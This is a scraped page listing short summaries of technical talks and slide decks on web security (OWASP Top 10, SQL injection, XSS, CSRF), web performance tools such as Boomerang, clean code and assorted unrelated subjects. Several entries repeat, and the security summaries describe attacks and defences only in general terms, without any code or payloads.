The document discusses input validation and output encoding to prevent vulnerabilities like XSS and SQL injection. It provides examples of how unexpected input can enable attacks, like special characters or invalid data types being passed to endpoints and rendered unencoded. The key lessons are that input validation is needed to receive clean, expected data, while output encoding is crucial to prevent exploits when displaying data to users. Both techniques are important defenses that address different but related issues.
The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
A lunch lecture was given at Differ (www.differ.nl) about another method of sequestering CO2. Olivine is one of the minerals that can be used for this application. The lecture details three routes for CO2 sequestration, with a focus on the development of a process intensification that would raise the geological reaction rate to a process-engineering time scale.
The proposed process has a parallel in the "VerTech process" as established in the 1990s in Apeldoorn (the Netherlands).
The lecture ranged from the global scale (focusing on the amounts of CO2 involved) down to the atomic scale.
Hacking Your Way to Better Security - PHP South Africa 2016, by Colin O'Dell
This talk educates developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, and more. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. We'll then apply this knowledge to see how web applications can be secured against such vulnerabilities.
The document discusses techniques for validating SSL certificates to prevent man-in-the-middle attacks. It describes reference certificates, where the client bundles the server's certificate and compares it to the one presented. It also covers certificate fingerprinting, where the client compares the certificate's fingerprint to a trusted reference. Both approaches aim to detect if a rogue certificate is intercepting the connection between client and server. The document cautions that certificate changes over time could break validation and recommends updating apps and references in a timely manner.
The document discusses various topics related to Ruby on Rails including SQLite3-Ruby, ERb, and Rack. It provides an overview of how SQLite3-Ruby works with Rails as the default database adapter. It also discusses how to use SQLite3-Ruby outside of Rails, including establishing connections, making queries, and preparing statements. The document then summarizes how ERb works as the template language in Rails and how to use it outside Rails. It ends with a brief mention of Rack.
This document describes a user authentication module created using PHP. It includes pages for sign up, login, password reset, and a user inbox. The sign up page collects user details and validates the information before inserting a new user record into a MySQL database. The login page authenticates users by matching their user ID and password. Password and security answers are encrypted before storage. The module provides functionality for common authentication tasks.
The document discusses principles of clean code, including:
- Functions should be small and focus on doing one thing.
- Use intention-revealing names for variables, functions, etc.
- Avoid comments when possible by making code self-documenting.
- Prefer exceptions over returning error codes to indicate problems.
Mugdha and Amish from OSSCube present on PHP security at OSSCamp, organized by OSSCube, a global Open Source enterprise for Open Source solutions.
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Why are most code bases bad? Why is it, that, despite our best intentions, code rots between our fingers? The answer is that most of us still think of code as merely a technical tool to reach a goal: implementing a feature, fixing a bug. While it certainly is that, it’s also a written medium for communicating with (other) people.
This document provides an overview of the ACC Europe's 2005 Annual Conference, including summaries of presentations on common differences between civil and common law jurisdictions and comparisons between common law systems.
The conference featured presentations from legal experts on topics such as distinguishing features of various European legal systems and procedural rules. One presentation provided a high-level summary of 501 differences between civil and common law jurisdictions.
Another presentation compared common law systems, noting differences in sources of law, roles of judges, and approaches to precedent between countries like England, Ireland, and local systems. The conference offered opportunities for lawyers to learn and discuss diverse international legal practices.
PHP has its own treasure chest of classic mistakes that surprise even the most seasoned expert: code that dies just by changing its namespace, strpos() that fails to find strings, or arrays that change without anyone touching them.
Does that get on your nerves too? Let's make a list of them, so we can always teach them to the new guys, spot them during code reviews and kick them out of our code once and for all. Come on, you're not frightening us!
The document contains code snippets for making API calls to PayPal to facilitate different parts of an Express Checkout transaction flow. The code handles setting up an Express Checkout transaction, getting details of an Express Checkout transaction, and completing payment for an Express Checkout transaction. It also includes code for setting up a billing agreement and reference transactions.
The document discusses a new service being launched by Moie Serv to provide document summarization in 3 sentences or less. The service aims to extract the key details and essential information from documents in a concise manner. It can summarize documents from legal, medical, academic and news domains. Customers will be able to access the summarization tool through Moie Serv's website.
Dip Your Toes in the Sea of Security (PHP South Africa 2017), by James Titcumb
Security is an enormous topic, and it’s really, really complicated. If you’re not careful, you’ll find yourself vulnerable to any number of attacks which you definitely don’t want to be on the receiving end of. This talk will give you just a taster of the vast array of things there is to know about security in modern web applications, such as writing secure PHP web applications and securing a Linux server. Whether you are writing anything beyond a basic brochure website, or even developing a complicated business web application, this talk will give you insights to some of the things you need to be aware of.
Comparative Genomics with GMOD and BioPerl, by Jason Stajich
BioPerl is an open source toolkit for bioinformatics data manipulation written in Perl. It contains modules for reading and writing sequence data in common formats, manipulating sequences, parsing BLAST reports and multiple sequence alignments. BioPerl objects represent sequences, features, annotations and search results in a flexible and extensible way. The toolkit is widely used for tasks like sequence analysis, parsing bioinformatics software output, and accessing biological databases.
This document discusses Boomerang, a JavaScript tool that measures web page performance from the end user's perspective. It works by including a small snippet of JavaScript on web pages that measures load time, latency, and bandwidth and sends the results back to the server. It provides more accurate real-world performance metrics than lab testing alone. The document explains how Boomerang specifically measures latency by downloading small images repeatedly, bandwidth by progressively larger images, and load time using timestamps. Contributing code or plugins to the Boomerang open source project on GitHub can help improve it.
This document is a presentation about JavaScript charting with YUI-Flot. It introduces YUI-Flot as a port of the Flot charting library to the YUI framework. It discusses charting options for the web, demonstrates basic chart types with YUI-Flot like scatter plots and time series, and covers how to include the library, get data, and instantiate charts. It also outlines future plans like supporting newer Flot features and contributions from the community.
Boomerang at the Boston Web Performance meetup, by Philip Tellis
The document discusses boomerang, a JavaScript tool for measuring web page performance from the end user's perspective. It works by measuring latency, bandwidth, and page load times and sending that data back to the developer. The collected data can be analyzed to identify outliers, trends over time, and opportunities for performance improvements based on factors like user location and ISP.
A survey found that 35% of viewers blame the operator when video streaming is not working properly, while 70% of subscribers consider TV Everywhere an important offering provided by their provider. The survey also found that gaining 50,000 additional subscribers can generate $50 million in annual revenue for providers.
The document discusses improving website performance. It notes that performance depends on bandwidth and latency. Bandwidth refers to the maximum data transfer rate, while latency refers to delays in data transfer. The document suggests concentrating optimization efforts on improving either bandwidth or latency based on individual website needs. Faster load times can positively impact user experience and business metrics like conversion rates.
Improving D3 Performance with CANVAS and other Hacks, by Philip Tellis
This document discusses techniques for improving the performance of D3 visualizations. It begins with an overview of D3 and some basic tutorials. It then describes issues with performance for force-directed layouts and edge-bundled layouts as the number of nodes and links increases. Solutions proposed include using canvas instead of SVG for rendering, reducing unnecessary calculations, and caching repeated drawing states. The document concludes that the number of DOM nodes has major performance implications and techniques like canvas can help when exact mouse interactions are not required.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
Some basic security controls you can (and should) implement in your web apps. Specifically this covers:
1 - Beyond SQL injection
2 - Cross-site Scripting
3 - Access Control
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
This document contains sample questions for the Zend Certification PHP 5 exam. It includes multiple choice questions testing PHP 5 language features and best practices related to topics like XML processing, database access, regular expressions, and security. The questions cover syntax, functions, patterns and other PHP concepts that could appear on the certification exam.
This document provides an overview and examples of using PHP for various purposes including as a templating system, scripting language, and for generating dynamic images and PDFs. It discusses PHP's widespread use based on statistics and provides code examples for creating graphs, charts and invoices using PHP's gdchart and PDF extensions.
Presented at #PHPLX 11 September 2013
The 2013 edition of the OWASP (Open Web Application Security Project) Top 10 has just been released and, unfortunately, injection (not only SQL injection) is still the most common security problem. In this talk we will review the Top 10 list of security problems, looking at possible attack scenarios and ways to protect against them, mostly from a PHP programmer's perspective.
This document discusses strategies for dealing with legacy PHP code, including separating controllers and views, removing dependencies on global variables, refactoring procedural code to be object-oriented, and untangling nested require statements. Specific problems in legacy PHP code are said to include mixing of PHP and HTML, overuse of requires instead of method calls, and excessive use of global variables. The document provides examples of refactoring code to address these issues.
The document discusses new features introduced in C# 7 and C# 7.1-7.2, including tuples, pattern matching, out variables, discards, numeric literals, local functions, generalized async return types, inferred tuple element names, default literals, async Main method, non-trailing named arguments, and leading separators for numeric literals. It provides links to Microsoft documentation and proposals for each new feature.
The document summarizes best practices for WordPress development. It recommends leveraging WordPress core functionality through APIs and hooks, contributing to core, internationalizing code, and following coding standards to write clean, readable code. It also emphasizes allowing others to hook into code through actions and filters and the importance of sanitization, escaping and security.
Ruby on Rails is a web application framework designed to make programming web applications easier. It emphasizes convention over configuration and includes features like ActiveRecord for object-relational mapping, ActionPack for building web applications, and ActionView for rendering views. Rails aims to provide a full-stack framework that makes it easy to build database-backed web applications by following its conventions.
This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
This document discusses error management in ZIO compared to Future. It begins with an overview of ZIO and Future effects before comparing how each handles errors. Key differences noted are that Future throws errors away on a side channel while ZIO composes errors. The document recommends best practices for error handling in ZIO like extending exceptions in sealed traits and avoiding reflexive logging. It concludes by discussing how ZIO enables next-generation debugging by tracking fibers and continuations during asynchronous execution.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Every software developer enjoys finding new and clever ways to solve problems, writing code using their wits, intelligence and creativity. However, sometimes being too clever can lead to hard-to-track bugs, maintainability issues and impossible-to-understand code. Is all cleverly written code good code, or is it a problem just waiting to happen? In this session, I will show you real-world examples of cleverly written code, and show you how we can use clean code principles, refactoring and design patterns to transform that code from clever code to good code – one that your peers and future self would thank you for writing.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document discusses refactoring legacy PHP code, specifically dealing with code that has no separation between PHP and HTML. It recommends separating code into controllers and views by gathering all code, separating controller and view code, assigning variables to a view object, changing variable references in the view code, and splitting the files. Specific problems in legacy PHP code like no separation of concerns, global variables, and reliance on includes can be addressed through techniques like creating view classes, encapsulating logic in objects, and wrapping includes in functions to untangle dependency webs. The goal is to safely change code implementation without changing behavior through refactoring.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
A talk about the current state of Java enterprise development, an evaluation of the available alternatives to conventional enterprise solutions, and tools and languages for the JVM, and possibly beyond.
JUG-Roma meeting 16 Sept 2014
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Frontend Performance: Beginner to Expert to Crazy Person
There's no such thing as fast enough. You can always make your website faster. This talk will show you how. The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they get tired and leave. In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
The CheckAccessCard function verifies the presence of a card and checks if it is accessible. It checks the communication port, reader type, card serial number, key file and PIN. It returns 1 if the card is accessible or 0 if not accessible.
Azure Video Analyzer OpenVino Extension Module on Raspberry Pi with Movidius
The document discusses using an OpenVino extension module on a Raspberry Pi with a MOVIDIUS to run object detection, face recognition, and other AI models in a low-cost way. It provides details on the logic flow of the face recognition module, supported AI models, and how to develop an IoT Edge module to integrate the OpenVino functionality with Azure Video Analyzer on Edge. Developing the module requires addressing differences in CPU architectures between the Raspberry Pi, MOVIDIUS, and Azure Video Analyzer on Edge.
This document provides an overview of new features in PHP 6 and the intl extension that improve support for internationalization and localization. Some key points include:
- PHP 6 includes full Unicode support throughout the engine, extensions, and API using the ICU library.
- The intl extension includes classes for collating and sorting strings, formatting numbers and currencies based on locales, and transliterating between scripts.
- New text iterator and text transform classes allow powerful linear and chained processing of Unicode text.
- Streams support automatic encoding conversions for reading/writing files in different encodings.
- Functions like strtoupper() now perform proper locale-aware case mappings.
The goal of this talk is to educate developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, session hijacking, and insecure direct object references. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. Once we've established an understanding of how these attacks work, we'll look at concrete steps you can take to secure web applications against such vulnerabilities. The knowledge gained from this talk can also be used for participating in "Capture the Flag" security competitions.
The document discusses various PHP security vulnerabilities like code injection, SQL injection, cross-site scripting (XSS), session hijacking, and remote code execution. It provides examples of each vulnerability and methods to prevent them, such as input validation, output encoding, secure session management, and restricting shell commands. The goal is to teach secure PHP programming practices to avoid security issues and defend against common attacks.
A lunch lecture was given at Differ (www.differ.nl) about another method of sequestering CO2. Olivine is one of the minerals that can be used for the application. It details three routes for CO2 sequestration. A focus is given on the development of a process intensification. This would increase the geological reaction rate to process engineering time scale.
The proposed process has got a parallel in the "VerTech process" as established in the 1990's in Apeldoorn (the Netherlands).
The lecture was from global scale (focussing on amounts of CO2 involved) down to atomic scale.
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
This talk educates developers on common security vulnerabilities, how they are exploited, and how to protect against them. We'll explore several of the OWASP Top 10 attack vectors like SQL injection, XSS, CSRF, and more. Each topic will be approached from the perspective of an attacker to see how these vulnerabilities are detected and exploited using several realistic examples. We'll then apply this knowledge to see how web applications can be secured against such vulnerabilities.
The document discusses techniques for validating SSL certificates to prevent man-in-the-middle attacks. It describes reference certificates, where the client bundles the server's certificate and compares it to the one presented. It also covers certificate fingerprinting, where the client compares the certificate's fingerprint to a trusted reference. Both approaches aim to detect if a rogue certificate is intercepting the connection between client and server. The document cautions that certificate changes over time could break validation and recommends updating apps and references in a timely manner.
The document discusses various topics related to Ruby on Rails including SQLite3-Ruby, ERb, and Rack. It provides an overview of how SQLite3-Ruby works with Rails as the default database adapter. It also discusses how to use SQLite3-Ruby outside of Rails, including establishing connections, making queries, and preparing statements. The document then summarizes how ERb works as the template language in Rails and how to use it outside Rails. It ends with a brief mention of Rack.
This document describes a user authentication module created using PHP. It includes pages for sign up, login, password reset, and a user inbox. The sign up page collects user details and validates the information before inserting a new user record into a MySQL database. The login page authenticates users by matching their user ID and password. Password and security answers are encrypted before storage. The module provides functionality for common authentication tasks.
The document discusses principles of clean code, including:
- Functions should be small and focus on doing one thing.
- Use intention-revealing names for variables, functions, etc.
- Avoid comments when possible by making code self-documenting.
- Prefer exceptions over returning error codes to indicate problems.
Mugdha and Amish from OSSCube present on Php security at OSSCamp, organized by OSSCube - A Global open Source enterprise for Open Source Solutions
To know how we can help your business grow, leveraging Open Source, contact us:
India: +91 995 809 0987
USA: +1 919 791 5427
WEB: www.osscube.com
Mail: sales@osscube.com
Why are most code bases bad? Why is it, that, despite our best intentions, code rots between our fingers? The answer is that most of us still think of code as merely a technical tool to reach a goal: implementing a feature, fixing a bug. While it certainly is that, it’s also a written medium for communicating with (other) people.
This document provides an overview of the ACC Europe's 2005 Annual Conference, including summaries of presentations on common differences between civil and common law jurisdictions and comparisons between common law systems.
The conference featured presentations from legal experts on topics such as distinguishing features of various European legal systems and procedural rules. One presentation provided a high-level summary of 501 differences between civil and common law jurisdictions.
Another presentation compared common law systems, noting differences in sources of law, roles of judges, and approaches to precedent between countries like England, Ireland, and local systems. The conference offered opportunities for lawyers to learn and discuss diverse international legal practices.
PHP has its own treasure chest of classic mistakes that surprises even the most seasoned expert : code that dies just by changing its namespace, strpos() that fails to find strings or arrays that changes without touching them.
Do that get on your nerves too ? Let’s make a list of them, so we can always teach them to the new guys, spot them during code reviews and kick them out of our code once and for all. Come on, you’re not frightening us !
The document contains code snippets for making API calls to PayPal to facilitate different parts of an Express Checkout transaction flow. The code handles setting up an Express Checkout transaction, getting details of an Express Checkout transaction, and completing payment for an Express Checkout transaction. It also includes code for setting up a billing agreement and reference transactions.
The document discusses a new service being launched by Moie Serv to provide document summarization in 3 sentences or less. The service aims to extract the key details and essential information from documents in a concise manner. It can summarize documents from legal, medical, academic and news domains. Customers will be able to access the summarization tool through Moie Serv's website.
Dip Your Toes in the Sea of Security (PHP South Africa 2017)James Titcumb
Security is an enormous topic, and it’s really, really complicated. If you’re not careful, you’ll find yourself vulnerable to any number of attacks which you definitely don’t want to be on the receiving end of. This talk will give you just a taster of the vast array of things there is to know about security in modern web applications, such as writing secure PHP web applications and securing a Linux server. Whether you are writing anything beyond a basic brochure website, or even developing a complicated business web application, this talk will give you insights to some of the things you need to be aware of.
Comparative Genomics with GMOD and BioPerlJason Stajich
BioPerl is an open source toolkit for bioinformatics data manipulation written in Perl. It contains modules for reading and writing sequence data in common formats, manipulating sequences, parsing BLAST reports and multiple sequence alignments. BioPerl objects represent sequences, features, annotations and search results in a flexible and extensible way. The toolkit is widely used for tasks like sequence analysis, parsing bioinformatics software output, and accessing biological databases.
This document discusses Boomerang, a JavaScript tool that measures web page performance from the end user's perspective. It works by including a small snippet of JavaScript on web pages that measures load time, latency, and bandwidth and sends the results back to the server. It provides more accurate real-world performance metrics than lab testing alone. The document explains how Boomerang specifically measures latency by downloading small images repeatedly, bandwidth by progressively larger images, and load time using timestamps. Contributing code or plugins to the Boomerang open source project on GitHub can help improve it.
This document is a presentation about javascript charting with YUI-Flot. It introduces YUI-Flot as a port of the Flot charting library to the YUI framework. It discusses charting options for the web, demonstrates basic chart types with YUI-Flot like scatter plots and time series, and covers how to include the library, get data, and instantiate charts. It also outlines future plans like supporting newer Flot features and contributions from the community.
Boomerang at the Boston Web Performance meetupPhilip Tellis
The document discusses boomerang, a JavaScript tool for measuring web page performance from the end user's perspective. It works by measuring latency, bandwidth, and page load times and sending that data back to the developer. The collected data can be analyzed to identify outliers, trends over time, and opportunities for performance improvements based on factors like user location and ISP.
A survey found that 35% of viewers blame the operator when video streaming is not working properly, while 70% of subscribers consider TV Everywhere an important offering provided by their provider. The survey also found that gaining 50,000 additional subscribers can generate $50 million in annual revenue for providers.
The document discusses improving website performance. It notes that performance depends on bandwidth and latency. Bandwidth refers to the maximum data transfer rate, while latency refers to delays in data transfer. The document suggests concentrating optimization efforts on improving either bandwidth or latency based on individual website needs. Faster load times can positively impact user experience and business metrics like conversion rates.
Improving D3 Performance with CANVAS and other Hacks by Philip Tellis
This document discusses techniques for improving the performance of D3 visualizations. It begins with an overview of D3 and some basic tutorials. It then describes issues with performance for force-directed layouts and edge-bundled layouts as the number of nodes and links increases. Solutions proposed include using canvas instead of SVG for rendering, reducing unnecessary calculations, and caching repeated drawing states. The document concludes that the number of DOM nodes has major performance implications and techniques like canvas can help when exact mouse interactions are not required.
This document summarizes common web application vulnerabilities like SQL injection and cross-site scripting (XSS) for PHP applications. It provides examples of each vulnerability and discusses mitigation strategies like input sanitization, encoding output, and using security frameworks. It also covers other risks like cross-site request forgery (CSRF) and the importance of secure server configurations.
Some basic security controls you can (and should) implement in your web apps. Specifically this covers:
1 - Beyond SQL injection
2 - Cross-site Scripting
3 - Access Control
These are the slides from a talk "Spot the Web Vulnerability" held at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) by Miroslav Stampar.
This document contains sample questions for the Zend Certification PHP 5 exam. It includes multiple choice questions testing PHP 5 language features and best practices related to topics like XML processing, database access, regular expressions, and security. The questions cover syntax, functions, patterns and other PHP concepts that could appear on the certification exam.
This document provides an overview and examples of using PHP for various purposes including as a templating system, scripting language, and for generating dynamic images and PDFs. It discusses PHP's widespread use based on statistics and provides code examples for creating graphs, charts and invoices using PHP's gdchart and PDF extensions.
Presented at #PHPLX 11 September 2013
The 2013 edition of the OWASP (Open Web Application Security Project) Top 10 has just been released and unfortunately injection (not only SQL injection) is still the most common security problem. In this talk we will review the top 10 list of security problems, looking at possible attack scenarios and ways to protect against them, mostly from a PHP programmer's perspective.
This document discusses strategies for dealing with legacy PHP code, including separating controllers and views, removing dependencies on global variables, refactoring procedural code to be object-oriented, and untangling nested require statements. Specific problems in legacy PHP code are said to include mixing of PHP and HTML, overuse of requires instead of method calls, and excessive use of global variables. The document provides examples of refactoring code to address these issues.
The document discusses new features introduced in C# 7 and C# 7.1-7.2, including tuples, pattern matching, out variables, discards, numeric literals, local functions, generalized async return types, inferred tuple element names, default literals, async Main method, non-trailing named arguments, and leading separators for numeric literals. It provides links to Microsoft documentation and proposals for each new feature.
The document summarizes best practices for WordPress development. It recommends leveraging WordPress core functionality through APIs and hooks, contributing to core, internationalizing code, and following coding standards to write clean, readable code. It also emphasizes allowing others to hook into code through actions and filters and the importance of sanitization, escaping and security.
Ruby on Rails is a web application framework designed to make programming web applications easier. It favours convention over configuration and includes components like ActiveRecord for object-relational mapping, ActionPack for building web applications, and ActionView for rendering views. Rails aims to provide a full-stack framework that makes it easy to build database-backed web applications by following its conventions.
This document outlines three "creeds" or principles for front-end engineers according to Morgan Cheng. Creed I states that performance is a key feature and outlines best practices like minimizing HTTP requests and assets. Creed II discusses progressive enhancement and building web pages that degrade gracefully across browsers. Creed III states the importance of being paranoid about security vulnerabilities like SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF) by never trusting user input.
This document discusses error management in ZIO compared to Future. It begins with an overview of ZIO and Future effects before comparing how each handles errors. Key differences noted are that Future throws errors away on a side channel while ZIO composes errors. The document recommends best practices for error handling in ZIO like extending exceptions in sealed traits and avoiding reflexive logging. It concludes by discussing how ZIO enables next-generation debugging by tracking fibers and continuations during asynchronous execution.
Dan Kaminsky introduces his new company Recursion Ventures and discusses session management on the web. He explains that the web was not designed for authenticated resources and credentials are easily accessible across sites due to issues with cookie-based session management. Kaminsky proposes using smarter string interpolation to allow developers to write code inline while preventing injections. He demonstrates a prototype called Interpolique that uses base64 encoding to sanitize variables before insertion into queries. This approach aims to make secure coding easier and mistakes immediately apparent.
Every software developer enjoys finding new and clever ways to solve problems, writing code using their wits, intelligence and creativity. However, sometimes being too clever can lead to hard-to-track bugs, maintainability issues and impossible-to-understand code. Is all cleverly written code good code, or is it a problem just waiting to happen? In this session, I will show you real-world examples of cleverly written code, and show you how we can use clean code principles, refactoring and design patterns to transform that code from clever code to good code – code that your peers and future self would thank you for writing.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come back by DefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document discusses refactoring legacy PHP code, specifically dealing with code that has no separation between PHP and HTML. It recommends separating code into controllers and views by gathering all code, separating controller and view code, assigning variables to a view object, changing variable references in the view code, and splitting the files. Specific problems in legacy PHP code like no separation of concerns, global variables, and reliance on includes can be addressed through techniques like creating view classes, encapsulating logic in objects, and wrapping includes in functions to untangle dependency webs. The goal is to safely change code implementation without changing behavior through refactoring.
This document introduces Interpolique, a new approach to string interpolation that aims to prevent SQL injection and other injection attacks. It demonstrates how Interpolique works by rewriting inline SQL queries to use parameterized queries behind the scenes. Interpolique uses base64 encoding to safely pass variable data into queries. It allows developers to write queries inline while still protecting against injection. The goal is to let developers write code as they normally would but make injection attacks much harder to perform.
A talk about the current state of java enterprise development, evaluation of the available alternatives to conventional enterprise solutions, tools and languages for the JVM, and possibly beyond.
JUG-Roma meeting 16 Sept 2014
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Frontend Performance: Beginner to Expert to Crazy Person by Philip Tellis
There's no such thing as fast enough. You can always make your website faster. This talk will show you how. The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they get tired and leave. In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
Frontend Performance: From Beginner to Expert to Crazy Person by Philip Tellis
Frontend Performance Beginner to Expert to Crazy Person
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they get tired and leave.
In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
Frontend performance from beginner, to expert, to crazy person!
The very first requirement of a good user experience is being able to get the bytes of that experience to the user before they get bored and leave.
We will start this talk with the basics and progressively get insane. We will cover several frontend performance best practices, a few anti-patterns to avoid, the reasoning behind the rules, and how those rules have changed over the years. We will also take a closer look at a few very good tools that can help you.
Frontend Performance: Expert to Crazy Person by Philip Tellis
The document outlines steps for front-end performance optimization, beginning with basic techniques like caching, compression and domain sharding and progressing to more advanced strategies involving preloading, parallel downloads, and predicting response times. It was presented by Philip Tellis at WebPerfDays New York and includes references for further reading on topics like CDNs, TCP tuning, and the page visibility API.
RUM isn’t just for page level metrics anymore. Thanks to modern browser updates and new techniques we can collect real user data at the object level, finding slow page components and keeping third parties honest.
In this talk we will show you how to use Resource Timing, User Timing, and other browser tricks to time the most important components in your page. We’ll also share recipes for several of the web’s most popular third parties. This will give you a head start on measuring object level performance on your own site.
Frontend Performance: Beginner to Expert to Crazy Person (San Diego Web Perf ... by Philip Tellis
The document outlines steps web performance experts take to optimize frontend performance, moving from beginner to advanced techniques. It starts with basic optimizations like enabling gzip, caching, and image optimization. It then discusses more advanced strategies like using a CDN, splitting JavaScript, auditing CSS, and parallelizing downloads. Finally it discusses very advanced techniques like pre-loading assets, detecting broken Accept-Encoding headers, and understanding how to optimize for HTTP/2. The document provides references for further information on each topic.
Frontend Performance: Beginner to Expert to Crazy Person by Philip Tellis
The document discusses front-end web performance optimization from beginner to expert levels. At the beginner level, it recommends starting with basic optimizations like measuring performance, enabling gzip compression, optimizing images, and caching. At the expert level, it discusses more advanced techniques like using a CDN, splitting JavaScript files, auditing CSS, and flushing content early. Finally, it outlines "crazy" optimizations like pre-loading assets, post-load fetching, and understanding round-trip network latency.
Frontend Performance: Beginner to Expert to Crazy Person by Philip Tellis
Boston Web Performance Meetup, April 22, 2014
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they get fed up and leave. In this talk we'll start with the basics and get progressively insane. We'll go over several front-end performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
Schedule: 6:30, pizza
7:15: talk
Frontend Performance: Beginner to Expert to Crazy Person by Philip Tellis
The very first requirement of a great user experience is actually getting the bytes of that experience to the user before they get fed up and leave.
In this talk we'll start with the basics and get progressively insane. We'll go over several frontend performance best practices, a few anti-patterns, the reasoning behind the rules, and how they've changed over the years. We'll also look at some great tools to help you.
The document appears to be a presentation on measuring real user experiences using Real User Monitoring (RUM) and analyzing the data. It discusses using RUM tools like Boomerang to collect data on user behavior and performance in real-time. The presentation then examines specific metrics collected like user patience, cache behavior, and how quickly new software versions are distributed based on the RUM data.
Improving 3rd Party Script Performance With IFrames by Philip Tellis
This document discusses using <IFRAME> tags to improve the performance of third party scripts. It describes how third party scripts normally block page loading and proposes using an iframe to load scripts asynchronously in parallel without blocking. It provides code for creating an iframe targeted to load scripts, handling cross-domain issues, and modifying the Method Queue Pattern to support iframes. The approach allows third party scripts to load without blocking the main page load.
The document discusses Boomerang, an open source tool for measuring real user performance on websites. It measures load times, bandwidth usage, latency and other metrics. Additional functionality can be added through plugins. The presentation encourages developers to use Boomerang to analyze user behavior, identify performance issues, and continuously improve sites based on real user data. It provides several examples of insights that can be gained, such as how performance varies by country, browser, and internet connection speed.
Abusing JavaScript to measure Web Performance, or, "how does boomerang work?" by Philip Tellis
The document is a presentation about abusing JavaScript to measure web performance. It discusses using JavaScript to measure network latency, TCP handshake time, network throughput, DNS lookup time, IPv6 support and latency, and other performance metrics. It provides code examples for measuring each metric in JavaScript and notes challenges to consider. The presentation encourages the use of the open source Boomerang library for accurate performance measurement.
The Statistics of Web Performance Analysis by Philip Tellis
If you're interested in measuring real user web performance, you'll find tools like boomerang or episodes quite handy. Some popular web frameworks even have modules that make it easy to add them to your site. However, what does one do once one has collected the data? How do you filter out the noise and get meaningful insights from the data?
In this talk, I'll go over the techniques we've picked up by analyzing millions of datapoints daily. I'll cover some simple rules to filter out invalid data, and the statistics to analyze and make sense of what's left. Do you use the mean, median or mode? What about the geometric mean and standard deviation? How confident are we in the results? And finally, why should we care?
